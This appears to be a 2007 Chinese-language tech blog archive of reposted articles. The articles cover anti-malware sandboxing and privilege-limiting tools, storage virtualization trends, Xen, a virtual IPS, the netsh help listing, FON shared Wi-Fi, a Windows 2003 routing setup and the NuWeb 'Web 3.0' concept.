據《PCworld》網站之報導,採取這種預防性策略的軟件至少已有5個。名為Amust's 1-Defender與 DropMyRights的程式是免費的軟件,它們以限制軟件(含惡意程式)對電腦進行重要變動的方式來達到保護。例如,防止程式改變非使用者控制的視窗登錄碼(Windows Registry)。雖然這是很基本的方式,但這些工具確實有很好的效果,特別是DropMyRights,它對任何程式均有效果。
效果更強的應用程式還有兩種,即GreenBorder Pro及Fortres Grand的Virtual Sandbox。它們的策略是將互聯網程式封在「砂箱(sandbox)」之中。在砂箱中執行的軟件會被阻隔,使其無法進行系統層面的更改及接觸個人性檔案,如金融應用軟件中的個人銀行往來文件之類。
GreenBorder Pro目前只能在IE瀏覽器下執行,但火狐版也在規劃中,促銷價為美金30元,消費者可獲得使用許可及一年的產品更新權。Virtual Sandbox的售價為美金50元,可與任何應用程與並用。它會對任何欲在您電腦上執行的程式予以把關,請求使用者的批准,因此其時常出現的警訊頗為擾人,而且它的設定較GreenBorder Pro為複雜。
若要更強的防護,可考慮免費的VMWare Player and Browser Appliance (VMWare播放與瀏覽器)。這個很有份量的下載程式中含有一火狐瀏覽器,係在一個完全虛擬的環境中執行,有如專門執行網絡作業的另一台獨立電腦。以下再就各種防護措施進行詳細的介紹。
縮減使用權限
對於使用者帳戶相關的防護,微軟視窗系統很需要外援,來幫忙處理基本的安全問題。一般人為了方便多使用Windows管理者等級之帳戶(administrator account)身份來登入系統,但多不知該權限賦予了使用者變更登錄碼、安裝軟體及存取所有檔案的完全處置權力。為提昇安全性,使用者可改採以「限權使用者帳戶(limited user account)」亦稱為「最低待遇級使用者帳戶(least-privileged user account, LUA)」來登入系統,此身份亦會跟隨任何想滲透你的系統的惡意程式,因而可以將其危害的權力也降至最低。
然而,實務上幾乎無人願意如此做,因為以這種帳別來使用電腦會帶來許多不便。諸如改變系統的時區或安裝合法軟體等平常的操作,視窗系統便不會悉聽尊便,您必須登出後再以管理者身份登入才能達成。
為求便利,大部份的使用者不願另設一帳戶,於是犧牲了安全性。惡意軟件來自有毒的網站或帶毒的郵件,經由系統或應用程式的漏洞滲透到電腦內部,也被賦予了全權處置的權力,登堂入室地把自己安置在系統目錄下,便可任意地破壞防毒程式,電腦只能任其宰割了。相比之下,若病毒不被賦予特權,則如同被拔爪去牙的猛獸,成不了氣候了。
◎ Amust's 1-Defender便是此種限權的免費應用程式。去年12月發表後,今年4月已升級至2.0版。它可與微軟IE、Outlook及Windows Messenger相容,安裝簡易。使用時,您可選擇建立新的桌面及快速啟動圖塊,以便將各種程式以非管理者的身份啟動,即使您原本是以管理者來登入系統。在視窗的左上部份會出現一個提示畫面(splash screen)及一個圖塊,表示您正在安全的互聯網(SafeInternet)模式下操作。在這種模式下使用您的PC,您及任何的惡意程式都不能再對系統進行任何形式的安裝,也不能對登錄碼進行危害性的變更。
從別的程式或檔案中點選的連結將會使IE以安全模式啟動。您可以按shift鍵再點選連結來避開這種啟動方式,或直接點擊舊圖塊來以管理者身份啟動IE。其它的動作如開啟檔案或安裝新的工具列等均保持不變。
◎ DropMyRights是另一種以限權身份啟動應用程式的免費小軟件。係由微軟資深的安全程式經理霍華德(Michael Howard)所發展,約在2004年間問世,但微軟並未將此軟件推上市場。它可與任何程式並用,安裝後您必須對欲應用此功能的軟體一一進行設定與建立捷徑。微軟MSDN網站的Microsoft Security Developer Center網頁中有詳細的使用手冊。
您若在另一個程式(如Word)中點選某個網頁的連結,除非該程式已設定與DropMyRights並用,否則預設的瀏覽器會照常啟動,但無安全防護。只能在安全模式下啟動瀏覽器後,再複製與貼上該連結,才能安全的開啟網頁。
微軟在新版視窗系統Vista中雖已準備規劃一個「防護模式(protected mode)」,可使IE 7在非管理者的權限下執行。微軟正嘗試要將採用LUA身份登入所造成的困擾予以解除,但目前Vista 的beta版顯示仍有須加強的努力空間。
隔離應用程式
◎ GreenBorder Pro未經您的許可前,會阻止任何企圖以IE來開啟檔案的動作。GreenBorder Pro目前專為IE所設計,它比DropMyRights 或1-Defender更進一步,它創造了一個砂箱好讓瀏覽器程式在其中運作。該軟件可阻擋惡意程式企圖寫入系統資料夾及執行各種管理者權限之類的活動,並且斷絕所有欲染指使用者檔案的接觸。
此外,它還提供了一個更高階的防護—隱私區(Privacy Zone)模式,可防止外部接觸到使用者的瀏覽歷史記錄及其它如線上金融活動相關的資料。在執行中,您可明顯感覺到IE被設了一圈安全警界線。若IE中的工具列或任何東西試圖開啟一個檔案,您可收到一個彈出視窗請求您的允准。在您未解除GreenBorder的防護前,所下載的可執行檔皆不能執行。若您對下載的應用程式陌生或未知,可在批准前先研究一下它的來歷,再決定是否安裝。
瀏覽器中書籤的增刪皆不會受到GreenBorder砂箱的限制,但新的工具列或其它新增程式則會被阻擋。您必須以未防護的模式啟動IE後,安裝工具列才可使它成為永久可用。
GreenBorder的安裝與執行皆很順暢,火狐版本正在開發中。但其訂購費用為每年30美元,可能會使消費者感到所得的防護差強人意。
◎ Fortres Grand所發展的Virtual Sandbox (虛擬砂箱)也建造了一個砂箱。當您安裝該程式時,它便會掃瞄您的系統,並預設所有瀏覽器的執行皆在砂箱內完成。電子郵件照常運作,但在雙擊附件檔案時便會啟動砂箱。它亦可讓您針對所需的程式來指定是否要在砂箱內執行。
由於Virtual Sandbox可與任何的程式相容,亦可阻擋新的應用程式之執行並請求使用者的允准,故它所提供的防護高於GreenBorder,故其索價不菲—50美元。美中不足之處是,目前該軟件對於任何新的程式,不論是安裝新程式、標準的視窗程式或該應用軟件尚不認識的程式等,一律以彈出式視窗要求使用者判斷;而且其組態設定的選單,並不讓人容易瞭解。
◎ VMWare所發展的瀏覽器裝置,係利用虛擬化技術實現了PC內架構另一台PC的設置,來將互聯網惡意軟件與視窗系統隔離。使用者若希望更加強的防護,但又不希望處理虛擬砂箱複雜的設定問題,則免費的VMWare播放與瀏覽器軟件或可為不錯的選擇。
該軟件的安裝分成兩個步驟,過程簡單得令人感到意外。安裝後,內建的火狐瀏覽器便可在完全獨立的Linux作業系統下執行。故此程式頗具份量,大小約為300MB。使用該系統的上網作業完全與微軟視窗作業系統脫離,即使惡意程式能突破火狐滲入Linux環境進行破壞,也不會傷及Windows分毫,而且要清理及復原這個受損的隔離作業系統,也變得很單純。
該軟件為上網衝浪活動提供強大的保護,但瀏覽器本身便消耗大量的硬碟資源,約300MB的記憶空間。此外,您必須為新的瀏覽器獨自設定,您不能直接了當地將已儲存的書籤檔匯入虛擬的播放器環境下使用。
以上所介紹的應用程式皆可讓您在瀏覽網頁及處理電郵時無後顧之憂,皆能使您電腦的安全性有效的提昇。據互聯網研究公司LURHQ資深安全研究員史都華 (Joe Stewart) 指出,就現況而言,修正管理者權限的弱點後,便可阻擋大部份的惡意程式碼。除非真的需要如砂箱及虛擬化瀏覽器等高階防護措施外,通常權限限制工具便可發揮良好的效用。
免費又有效的防護:DropMyRights
雖然其它的應用軟件可提供較昂貴的安全防護,DropMyRights卻提供了簡易、免費而又有效的保護,以限制使用者權限的方式來阻擋惡意程式作怪,而且它還可以和任何的程式相容。

2007年5月23日 星期三

瞭解數位憑證

http://technet.microsoft.com/zh-tw/library/bb123848.aspx
虛擬化,管理和中型市場,我的天!

作者:nowadays 編譯
內容導航:虛擬化是熱門話題
第1頁: 虛擬化是熱門話題 第2頁: 中型市場的混戰 第3頁: 管理的瘋狂
init_Nav();
【IT168 專稿】興奮異常的宣傳,廠商不斷地發佈新品的混亂,人們很難將霧裏看花的產品和技術相區別,從而在不斷改變著存儲的價值。如今到底什麼才是真正的熱點呢?而不僅僅是新聞界的吹捧?我們諮詢了幾位分析家,關於什麼是他們認為值得關注的趨勢,下面就是他們的回答。
大多數分析家似乎都把虛擬化作為一個真正有未來的領域而努力奮鬥著——或許是因為經受住了時間的考驗,如今虛擬化又成為企業管理方法中的佼佼者。
「如今,虛擬化已經成為存儲管理中的熱門話題之一。」Tony Lock說,他是英國Bloor Reseach的一位分析師,「虛擬化給我們帶來減少操作繁瑣的希望,同時可以降低企業成本,儘管在存儲的世界中,管理已經變得越來越複雜了。」
Steve Duplessie,是Enterprise Strategy Group的創始人和高級分析師,他指出IBM已經售出大概1,500個SAN卷控制器,HDS公司也開始高舉其TagmaStore虛擬陣列產品挺進存儲市場。而且,他還特別指出規模較小的廠商,比如StorageAge也已經在數百個各種各樣的環境下部署了他們的存儲產品。
「NAS虛擬化也強勢而來,代表廠商包括Acopia,Neopath和Rainfinity,都是大有希望。」Duplessie說,「智慧交換機的發展仍然比較落後,但我認為這只是時間問題。」John Webster,Data Mobility Group的創始人和高級分析師也同意存儲虛擬化將最終獲得成功。他相信虛擬化會變得越來越熱門,因為網路存儲環境已經越來越複雜。正是因為這樣,他認為主要的IT廠商將會推出相當多的虛擬化產品。
「大型的存儲廠商如今定位於穩固的存儲虛擬化平臺,還有一些像IBM這樣的廠商,甚至提供多種虛擬化的方式。」

========================================


中型市場的混戰
超越虛擬化的話題,分析家們也指出所有的廠商似乎都看準了中型市場,準備開始一場鏖戰。
「每一家廠商都在尋找機會進入中型市場,」Bloor說,「當對於靈活性的需求更加迫切的時候,任何比傳統存儲性價比更高的存儲解決方案都會受到中型市場的熱烈歡迎。」
雖然不是所有的中型企業會受到這個問題的困擾,但是卻有很多企業面臨這一難題。這個等級的公司一般都擁有TB級的數據,而且每年都會成倍增長。他們一般只有很少的高效管理存儲架構需要的技能,因此,成本和複雜度成了兩個大問題。所以,Webster和Duplessie都把中型市場作為未來數年發展的重點,也就不足為奇了。
「如果他們的生意只是賣油漆或者多納圈,他們肯定不願意僱用大量的IT人員,因此,中型市場將大有可為。」——Steve Duplessie
「如果他們的生意只是賣油漆或者多納圈,他們肯定不願意僱用大量的IT人員,因此,中型市場將大有可為。」Duplessie如是說。
在Duplessie看來,是中型市場讓EMC捲土重來。雖然像Symmetrix這種大廠家獲得了所有的榮譽,但掙錢的卻是Clariion產品線。他接著說,而且,這個市場已經成為革新者的肥沃土地,像EqualLogic和Compellent都提供智慧的,高端用戶的系統,價錢適中,企業可以負擔,並且易於使用。
在中型企業市場陣地的這一場混戰,也波及到了小企業這塊市場。似乎每一家廠商最近都有面向中小企業的 SAN產品問世。「Dell在中小企業市場中已經稱霸多年,HP 似乎也要分一杯羹,」Duplessie 說,「就連Sun都售出了大量低端用戶的SAN產品給他的客戶群。」
他還提到 QLogic的方法,就是將非常簡單的SAN 連接元素打包在一個易於購買即插即用的交換機中,而價格要比一般的SAN便宜得多。因此, Duplessie堅信SAN 在中小企業中破冰的日子不會太遙遠。只要除去成本和複雜度的問題,就沒有理由不去使用 SAN。不過Bloor認為,更多的廠商對於中小企業這塊市場的爭論焦點就在於此。
現實就是小型 SAN價格仍然居高不下,還有就是很多中小企業不具備管理它們的能力。現在需要的是在價格上降低門檻,在管理上更方便,並提供更易使用的 SAN管理工具。
Bloor 相信那些缺少的元素很快就會到來。然而,當它們到來之時,中小企業的SAN 和NAS將更難於區分。Webster 對這一點並不十分肯定。他認為中小企業SAN面對的是與 NAS的艱難鬥爭。
「在這個階段的用戶並不是很關心塊和文件輸入 /輸出之間的區別,而更關心一切要做的是否都完成了,並更進一步。」—— John Webster
「在這個階段的用戶並不是很關心塊和文件輸入 /輸出之間的區別,而更關心一切是否都完成了,並更進一步。」 Webster表示,「SAN廠商如今正在推進中小企業SAN ,不過,NAS 仍然佔有先機。」

======================================


管理的瘋狂
在很長一段時間裏,到底何處是存儲市場的出路?存儲似乎仍然是幾乎所有組織心中永遠的痛。
「還有很多企業仍然沒有完全意識到操作上存在的問題和管理永遠不斷膨脹的數據量所帶來的巨大成本。」Bloor說,「存儲管理將繼續是吸引投入的熱點,不管是對最終消費者而言還是對那些開發新方案的廠商。」
Duplessie表示贊同,「管理的問題仍然沒有真正得到解決,」他說,「數據越多,越難管理。」
Duplessie覺得存儲界正處於變更的邊緣,經濟現狀驅使物理存儲的成本極低,現在公司可以保留一切了——而且一些法案的實施,比如服務醫療保險便攜性和責任法案和薩班斯-奧克斯利法案也要求企業這麼做。
這就帶來了一個全新的問題——你如何「保留一切」?過去的幾十年中,是這樣考慮的——計算出如何存儲更多數據。現在我們可能走入了歧途。不應該只盲目地存儲更多數據,而是要更加注重如何尋找和使用我們保存的數據。
Duplessie介紹智慧查詢和索引(ISI)市場可能是一個解決這種令人頭疼的存儲問題的方案。這可能會帶來重點的轉移——重點放在及時找到存儲的數據上。換句話說,存儲要從「我能把多少東西塞到我的設備裏」轉變為「如何使用我存儲的數據來改善我的環境?」這代表了一種明顯不同的論調,而不是存儲廠商們高唱了多年的頌歌。
「存儲中的這種現狀已經存在了很長很長時間了,」Duplessie總結說,「但我認為存儲界可能要重新洗牌了。」

Xen虛擬軟體

 

Xen虛擬軟體

開源碼Xen虛擬軟體獲眾大廠背書
趕超Intel:AMD虛擬機技術穫得巨大突破
英特爾展開Vanderpool計劃,加速開發虛擬化技術
Intel未來CPU架構-Multi-Core研討會
英特爾加速晶片虛擬化計畫

能將一台電腦劃分為多個不同分割區的方法依賴一種被稱為虛擬化(virtualization)的概念,它們使軟體能夠模擬真實的硬體來執行不同的作業系統。

目前最流行的是VMware,他們稱為虛擬機器(virtual machine)。我們可以在不修改作業系統的情況下,安裝VMware,然後就得到了一台新的、由軟體模擬出來的電腦,之後就可以安裝新的作業系統。

而VMware和Xen之間的差異點在於:前者完全模擬電腦,因此理論上不需更動作業系統就可以直接執行虛擬機器;Xen則使用了被稱為「paravirtualization」的技術,但需要對作業系統進行適當的修改。所以目前Xen只能夠在一些Linux-based的系統上運作,也陸續受到一些資訊大廠的支持,原本也是贊助廠商之一的Microsoft,由於Xen碰觸了他們的敏感地帶,也就是系統核心,已經退出贊助的行列,在Windows上由於不能修改核心的緣故,所以無法使用Xen。

包括昇陽、惠普、Novell、英特爾、IBM、 Voltaire、Redhat、等等,都表態支持Xen。


另外在硬體方面,CPU廠商Intel與AMD正緊鑼密鼓地推動Multi-core的CPU架構,也就是Vanderpool計畫。這一系列的晶片功能改進中,最早加入的是「超執行緒」(Hyperthreading),可以讓晶片一次處理多項功能。另一個在短期的未來要加入的是「動態管理技術」(Active Management Technology),或簡稱AMT,可以在某台PC散播病毒時,讓管理人員從遠端關閉PC。

原本的Dual Core是直接在一顆CPU內放置兩顆核心,而Multi-core則是透過Hyper-Threading超執行緒技術,用一顆CPU模擬出兩顆CPU來增加系統運作上的效能,但是實際運作上,HT是利用填滿CPU多餘執行緒的方式達成的(所以HT稱為超執行緒技術)。


因此在資訊廠商軟體與硬體的夾攻下,可以期待未來在購買了一部電腦之後,不需額外添購什麼軟體,透過開發原碼的Xen,馬上就得到了兩台電腦的成效,連同Windows都不會放過。

首款虛擬平臺網路型IPS上市


首款虛擬平臺網路型IPS上市
文/黃彥棻 (記者) 2007-05-04

臺灣Reflex Security引進全世界第一臺虛擬化的網路型IPS,可防護虛擬化環境的網路安全。

為了節省硬體採購成本,以及提升伺服器應用效能,臺灣有不少企業,在去年已經陸續進行各種伺服器虛擬化的工作。不過,在虛擬環境中,仍然遭受如同實體環境一樣的各種資安威脅,為了確保虛擬作業環境中各種應用程式和系統的安全,日前臺灣引進目前全世界第一臺,針對虛擬化環境推出的網路型IPS(入侵防禦系統):Reflex VSA(Virtual Security Appliance)。Reflex Security臺灣分公司總經理李炳煌表示,安裝在VMware Infrastructure 3(VI3)平臺中,VSA除了可以畫出虛擬環境中的網路拓樸外,也可以避免常見的DoS(阻斷式攻擊)、溢位攻擊、病毒擴散及管控任何違反虛擬環境中存取規則的作為等。

虛擬化應用起飛,資安議題漸受重視
機器虛擬化,就是將實體機器、操作系統以及應用程式等,打包成為一個檔案,就是所謂的虛擬機器(Virtual Machine,VM)。研究機構IDC去年對亞太地區企業的調查資料顯示,臺灣在虛擬化的應用步伐,比起歐美和其他亞太地區的企業,應用進度上至少慢3年。從去年臺灣陸續有高科技廠商與金融業者,利用虛擬機器做伺服器整合,節省伺服器採購成本、提升伺服器效能,國外已經有越來越多企業,將企業內重要的營運系統,例如ERP(企業資源規畫)、CRM(客戶關係管理)等,在虛擬機器中執行。

「企業重要關鍵系統在虛擬機器中執行的趨勢是不變的,只是臺灣企業的應用步調慢了一點。」李炳煌說。「在實體機器模擬出來的作業環境,也就與現實環境中所面臨的資安風險一樣,」他表示,虛擬機器中的安全防護也必須如同實體機器一般,同樣要做到層層防護,不論防毒、防駭、進行修補程式等,一個都不能少。

因為虛擬機器上的應用剛起飛,相關的資安防護議題也剛萌芽,李炳煌表示,Reflex VSA是目前市面上第一款,針對虛擬機器推出的網路型入侵防禦軟體,2006年10月在美國發表,今年4月正式在臺灣推出。

VSA能畫網路拓樸與管控網路埠
這一款IPS在虛擬環境中接虛擬交換器,可在虛擬交換器之間部署網路型IPS(VSA)。李炳煌說,因為VSA可以用in-line和鏡射(mirror)方式得知虛擬網路流量,在不耗用任何實體網路資源情況下,畫出網路拓樸架構,藉此瞭解攻擊行為模式以及擴散範圍;甚至,連每一個網路埠(port)提供給哪一些應用程式使用,都在管理範圍之中。也因為可以畫出網路拓樸,他認為,這比起許多log(登入檔)的解讀更容易理解,成為VSA的重要特點。

透過控管軟體Reflex Command Center,可以清楚得知每一臺虛擬IPS的工作狀態。

當實體機器許多的網路攻擊來自L7(應用層),李炳煌認為,「虛擬機器面臨更多來自內網的威脅。」日前在中國大陸引發嚴重資安威脅的「熊貓燒香」,其實就是透過即時通訊軟體QQ使用的連接埠,入侵企業內部,這種通常與員工行為管控(EIM)等內網威脅相關。

VSA是IPS-Based的資安產品,使用開放源碼,針對虛擬交換器撰寫的IPS程式。李炳煌表示,應用程式伺服器亦可以藉由部署VSA阻擋可能的攻擊行為外,亦包含IP追蹤和限制虛擬機器中應用程式存取的功能。VSA除了支援VI3平臺,亦支援微軟Virtual PC或是Xen(廠商有Red Hat與Novell),甚至是昇陽Virtual Island虛擬機器。

由於VMWare仍是主要的虛擬機器平臺,李炳煌說,「現階段,VMWare的客戶,就是VSA的客戶,仍以金融業、高科技製造業與臺灣某些大型企業為主。」除了VMWare外,微軟現階段推出免費的虛擬機器,到年底,也會有其他軟體廠商加入虛擬機器的戰局。李炳煌表示,這也意味著,隨著虛擬機器的應用普及,相關的安全議題將更被重視。因近期授權費用重新調整,正式售價尚未出爐。文☉黃彥棻

2007年5月10日 星期四

Windows 的Dos外部命令---netsh

netsh
這個內容中的命令:
? - 顯示命令清單。
add - 新增項目清單中的設定項目。
bridge - 變更到 `netsh bridge' 內容。
delete - 刪除項目清單中的設定項目。
diag - 變更到 `netsh diag' 內容。
dump - 顯示設定指令檔。
exec - 執行指令檔。
firewall - 變更到 `netsh firewall' 內容。
help - 顯示命令清單。
interface - 變更到 `netsh interface' 內容。
ras - 變更到 `netsh ras' 內容。
routing - 變更到 `netsh routing' 內容。
set - 更新組態設定。
show - 顯示資訊。
winsock - 變更到 `netsh winsock' 內容。
下列是可使用的子內容: bridge diag firewall interface ras routing winsock
如果您要檢視命令的說明,請輸入該命令,後面接著一個空格, 然後輸入 ?。

2007年5月7日 星期一

共享式無線網路FON風潮

共享式無線網路FON風潮 十月席捲台灣記者曠文溱/台北報導29/8/2006原文網址 : http://taiwan.cnet.com/news/comms/0,2000062978,20109125,00.htm
訴求免費共享的無線網路應用催生者——西班牙公司FON,十月將正式抵台運作。
雖然在台灣的聲音還不大,但是負責生產FON專屬路由器的台灣網通廠商智邦科技表示,FON路由器自八月投入生產,底定於十月在台推出,之後預計將掀起一股共享式的無線網路應用熱潮。
信心來自於社群的熱烈擁戴。智邦負責FON在台事務的執行長特助林義凱表示,六月開放以低於五百元台幣的價格線上預購FON路由器後,一個半月的時間,已經有將近兩千個人登記。
而這樣的成績也鼓舞智邦科技,預估今年底之前會有一萬人參加FON,明年人數即會突破五萬人。「我們要做草根版的M台灣,」他說。
FON路由器初期售價在10美金上下。為了控制產品售價,上市之初只接受網路訂購。
什麼是FON?
就像Linux對軟體開發人員的意義一般,「FON」對無線網路使用者而言,訴求的就是一個開放、共享式的技術。只要參加FON會員,將FON專屬路由器界接上家裡的寬頻網路,那麼會員就會貢獻出部分網路頻寬。
「免費分享、分享免費(Share for free, access for free)」是FON的宗旨。會員在貢獻出頻寬後,爾後在其他地方,只要偵測到由其他FON會員分享出來的無線網路訊號,登入FON會員帳號密碼,就可以免費使用。
FON創辦人Martin Varsavsky是在有感於無線網路處處,卻無法即刻擷取使用的情況下提出這項概念,隨即在去(2005)年11月著手使其成為可能。靠著網路發大財的Skype、Google都是FON的出資者。
FON一開始的作法是在網路上提供韌體,供Linux-based路由器使用者下載、更新使用。在推出兩個月後發現行不通,因為Linux-based的路由器畢竟只限定在特定幾款產品。
「要支撐FON共享網路的概念,前提就是FON的會員要夠多。所以FON找上了智邦,乾脆以便宜的價格,大量出貨FON的專屬路由器,」林義凱說。
Varsavsky的願景獲得了始料未及的成功。林義凱表示,在FON在全球推出六個月的時間內,已經擁有了超過八萬個會員,代表的是八萬個無線網路熱點。相較於全球推行無線網路服務最成功的美國T- Mobile,後者在數年的耕耘下,也不過僅有三萬五千個熱點。
與寬頻網路供應商、手持裝置廠商合作
值得注意的是,雖然FON訴求的是免費共享,但是FON並不排除與寬頻網路供應商合作的可能。
根據FON的定義,FON的使用者稱之為FONeros,依照參與方式分為三種族群:免費提供頻寬者稱之為Linus;向FONeros收取無線網路服務費用的稱之為Bills;沒有提供免費頻寬,但意欲向Bills付費使用無線網路者,叫做Aliens。
林義凱表示,目前台灣主要網路服務供應商(ISP)都有與智邦科技接洽,合作方式可能有兩種:一者是將原本的無線網路架構納入FON的一環,讓Aliens透過FON帳號密碼直接付費使用,這時候ISP就成為了Bills。
一者則是更間接的合作方式。即使是FONeros中的Linus和Bills,分享出去的頻寬也是來自於固定寬頻網路。林義凱表示,越多人使用FON,背後代表的意義是FONeros可能就會拉高家裡的頻寬。預期這之後的發展,ISP業者也積極與FON搓合。
唯和ISP詳細合作內容將有待九月底產品上市之際正式公布。不過林義凱坦言,由於Bills/Aliens的收費機制仰賴網路小額付費,例如PayPal,但是前者在台灣並不普遍。
再者,林義凱表示,經過調查高達九成的FONeros還是比較偏好免費共享無線網路。所以與ISP業者的合作,列為FON在台灣的下一階段進程。
在此之前,FON還有其他事要做。
「除了拓展會員數,讓FON的據點變多之外,FON也將與其他手持裝置廠商合作,推出內建FON軟體的手機、PDA等,」林義凱說。
他表示這即是Skype成為FON出資者的原因。
「願景是,使用者用Wi-Fi/GPS雙模手持裝置或者Skype手機,上面會顯示附近的FON無線網路,使用者可以隨即登入,撥打Skype電話或者上網瀏覽資訊,」林義凱說。

Win2003作路由 區域網路共享多出口上網

出處:互聯網 http://big5.yesky.com/b5/biz.chinabyte.com/357/2255857.shtml

本校電腦中心機房共有電腦240台,已互連為區域網路,希望訪問校內資源時透過校園網接口,而訪問外部資源時透過ADSL接口。
  解決
  Windows XP和Windows 2003都自帶ADSL寬帶撥號程式,這裡只要使用Windows 2003的“路由和遠端訪問”程式稍加配置,就可搞掂一切。
  1、前提
  電腦一台(配置不用很高,只要能裝設Windows 2003就行),裝設有Windows2003作業系統,內插3塊網卡,網卡1:連接內部區域網路,IP:192.168.1.1,子網掩碼:255.255.255.0,通訊閘:空,DNS:空;網卡2:連接ADSL,IP:自動穫取,DNS:自動穫取;網卡3:連接校園網,IP:202.203.230.2,子網掩碼:255.255.255.0,通訊閘:202.203.230.1,DNS:202.203.220.2(假設校園網網段為202.203.220.0-202.203.230.0之間,DNS伺服器為202.203.220.2);
  2、伺服器配置
  Step1.按一下“開始”-“管理工具”-“路由和遠端訪問”,啟動配置嚮導;選擇本地伺服器,按一下“操作”-“配置並啟用路由和遠端訪問”(圖一)。按一下“下一步”,選擇“自定義配置”-“下一步”;覆選“請求撥號連接(由分支辦公室路由使用)”和“LAN路由”-“下一步”-“完成”,即可啟動路由和遠端訪問。
  Step2.選擇“網路接口”,按一下“操作”-“新建請求撥號接口”-“下一步”-“下一步”,選擇“使用以太網上的PPP(PPPoE)連接”-“下一步”-“下一步”,彈出“協議及安全措施”選項,去掉所有鉤選,按一下“下一步”,輸入ADSL帳號和密碼,“下一步”-“完成”。
  Step3.新建一批處理文件route.bat,並把其快捷方式添加到“開始”-“程式”-“啟動”下,編輯route.bat內容如下:
  cdroute delete 0.0.0.0
  route add 192.168.1.0 mask 255.255.240.0 192.168.1.1
  route add 202.203.220.0 mask 255.255.240.0 202.203.230.1
  route add 202.203.221.0 mask 255.255.255.0 202.203.230.1
  //(自行把校園網的IP段添加上)
  route add 202.203.230.0 mask 255.255.255.0 202.203.230.1
  3、用戶機配置
  TCP/IP配置如下:IP:192.168.1.x,子網掩碼:255.255.255.0,通訊閘:192.168.1.1,首選DNS伺服器:當地ADSL網域名稱伺服器IP(可向ADSL提供商查詢,如昆明電信的為:202.98.160.68),備用DNS伺服器:202.203.220.2。此處的DNS設定非常關鍵,有的人會誤把DNS設為:192.168.1.1。
  總結
  使用此方法實現寬帶共享,可節約購買路由器的費用,幾乎不佔用伺服器資源,且只要往伺服器上加插網卡,就可任意擴張用戶機數量或外部出口。我單位400多台電腦使用此種方法共享一條2MADSL寬帶將有一年,運轉非常穩定,每台電腦就象在獨立使用一根2MADSL在上網,同時可以快速瀏覽校內資源,實現網上辦公,何樂而不為!

2007年4月26日 星期四

吳昇老師的Web 3.0為何很特別

轉貼自 http://mr6.cc/?p=646

吳昇老師的Web 3.0為何很特別by Mr. 6 on January 12th, 2007, 目前有 26 則留言,
2 blog reactions觀看其他最新文章
台灣互聯網界最知名的教授之一、也是OpenFind創辦人與GAIS搜尋技術研究先驅的中正大學資科所副教授吳昇老師,年底才剛為他即將開發完成的「NuWeb」軟體舉行記者發表會,便在部落格圈掀起一些精采討論(請見文底的沿伸閱讀),在此儘量不再重覆各高手所提過的見解。下周,吳老師將針對投資人舉辦另一場投資說明會,時間是1月17日(三)晚上6:30pm ,地點在台大第二活動中心阿基米得廳。趕在這場盛會之前,我也來為NuWeb發表一點點看法。
NuWeb最吸引人的地方在於吳老師大膽的稱它為「Web 3.0」。我從國外回來,對吳老師並沒有在地資深網路人這麼有深厚感情,偶讀到新聞稿或部落格的形容,印象是老師是個既有想法又很會行銷的創業型教授,但當面見到老師、親耳聽到他侃侃闡述理想,終於瞭解為何吳老師為何被某友人喻為「無論他在嘉義還在天涯海角,一定要與他見一面」。
吳老師認為,人類有文明程度(civilization),互聯網上面也有「網明程度」(這是我自翻的,吳老師稱作「Webilization」)。Web 2.0不是技術,而是「境界」,網路發展到Web 2.0,這境界依然只相當於文明史上的帝國時代。吳老師認為,那些提供Web 2.0分享平台者,霸著使用者分享出來的內容不放,將其視為競爭優勢,他們反而還比Web 1.0壟斷。YouTube賣給Google,上百萬支影片也同時跟著換東家,網友一點好處也沒沾到,還因為自己的東西「在別人手上」,反而更被別人掐著脖子走。
吳昇老師所謂的Web 3.0解決方案,就是讓使用者可以把內容留在「自家電腦」裡,直接分享出去。NuWeb是一套由瀏覽器為主的軟體,長相很像大家熟悉的檔案管理員(Windows File Manager),右邊是瀏覽視窗,左邊是檔案夾目錄;檔案夾目錄又分為兩塊,左下角是自己電腦,左上角是整個互聯網的其他電腦。在NuWeb這樣的視覺設計下,所有的互聯網上面的電腦都好像企業網路內的工作站(workstation),只是現在點進那台電腦,看到的不再是死沉沉檔案列表,而是直接以美美的畫面顯示該台電腦中所存放的照片、影片、聲音檔、文件。左邊點選,立刻在右邊的大視窗播放。所以從閱覽的角度來看,NuWeb是一個可以瀏覽全球任何一台個人電腦的內容的新瀏覽器。
從分享的角度來看,每個人都可以透過這個平台將自己電腦裡的東西分享出去,讓別人在自家用瀏覽器觀看。NuWeb提供部落格、相簿、影片播放中心的版型,以後我們錄了影片或照照片,只要傳到自家電腦,全世界便可以點進來觀賞,不必再多花時間上傳到某個網站;每個檔案夾都可以作權限控管,要開放給誰自己決定,並且可設密碼保護。假如對方喜歡你的內容,他也可以點選、收藏起來,變成自己的內容。
除了這些以外,NuWeb和一般IE與Firefox瀏覽器不同的是,它試著在網站上增加加值服務,來加強這種「一切收藏在自家電腦」的功能。目前已開發的有Google、Yahoo!、MSN、Ask、Answers、Wikipedia、Baidu,只要使用NuWeb在這幾個站搜尋到喜歡的內容,按一個鈕,就可以全部下載收藏到電腦裡;吳老師視這功能為「為網站加值」,幫網站提供更多東西(這部份說不定未來開放給所有網站開發者都可自行添加),也等於「為使用者加值」,因為使用者可以把網路上一些暫時的內容(如明天就被取下的新聞)收藏起來。
不過,技術上來看,每人都在自家電腦安裝了NuWeb還不夠,這整個p2p系統還得需要設置夠強大的伺服器才能運作,伺服機主要的任務是做網名轉譯(Name Resolution)和暫存區管理(Cache Management),這兩個部份可能也是整個NuWeb架構最重要、也是技術難度最高的地方(我認為到目前為止似還是無解的難度)。當我想點進一台叫做「HelloKitty」的電腦,必須請問中央伺服機它的IP住址是多少,伺服機會告訴你這台電腦最新的IP住址(他們稱為WNS服務),所以它這個域名可以用在變動IP的環境裡面;然而這東西要怎麼像DNS伺服機這樣propagate,然後它只有單層域名的設計是否造成collision與lookup的困難,可說是NuWeb接下來一大挑戰。當我試圖連上「HelloKitty」電腦觀看她的部落格,此電腦可能處於斷線的狀況,那這時候伺服機就會給我暫存區的東西,至於從自己電腦上載到中央伺服機的暫存區這一段,吳老師表示會做到完全無感覺(transparent)。那,若我想做搜尋,怎麼辦?也要仰賴暫存區的內容,以及另一套indexing的資料庫,暫存區要多大才夠?談到搜尋的部份,吳老師信心滿滿,因為這的確是他們起家的技術。
